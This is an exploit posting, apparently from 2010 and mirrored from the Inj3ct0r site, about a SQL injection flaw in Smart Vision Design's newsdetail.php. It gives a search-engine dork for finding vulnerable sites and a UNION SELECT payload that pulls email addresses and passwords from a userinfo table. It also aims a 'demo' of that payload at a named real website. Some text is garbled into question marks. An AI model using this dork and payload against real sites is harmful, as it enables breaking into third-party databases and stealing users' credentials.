Home / os / win7

Smart Vision Design (newsdetail.php) SQL Injection Vulnerabi

Posted on 04 June 2010

<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>Smart Vision Design (newsdetail.php) SQL Injection Vulnerability</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>====================================================================
Smart Vision.com Design (newsdetail.php) SQL Injection Vulnerability
====================================================================


##########################################################

[+] Smart Vision.com Design (newsdetail.php) SQL Injection Vulnerability

[+] Discovered by : killerboy

[+] Published: 2010-06-04


##########################################################



# Script Homepage:

# http://www.esmart-vision.com/

[+]Dork: &quot;inurl:newsdetail.php?id=&quot; &quot;Copyright 2010 ? Smart Vision.com All rights reserved&quot;

[+] SQL Injection


??? http://[target]/newsdetail.php?id=[SQL]

??? http://[target]/newsdetail.php?id=-9999+union+select+1,2,concat_ws%28char%2858%29,Email,0x3a,Password%29,4,5,6,7+from+userinfo--


Demo : ??? http://www.mouafaqbtc.com/newsdetail.php?id=1

?????? ??? http://www.mouafaqbtc.com/newsdetail.php?id=-9999+union+select+1,2,concat_ws%28char%2858%29,Email,0x3a,Password%29,4,5,6,7+from+userinfo--

##########################################################

Special Thanks to :

my love

greetings to my friends:


R4mz3x, Z3us, Hackpsycho, K0ol, Iquitoshack, Rayok3nt, and all my friends... !!!


##########################################################


# <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-06-04]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>

 

TOP

Malware :

Exploits :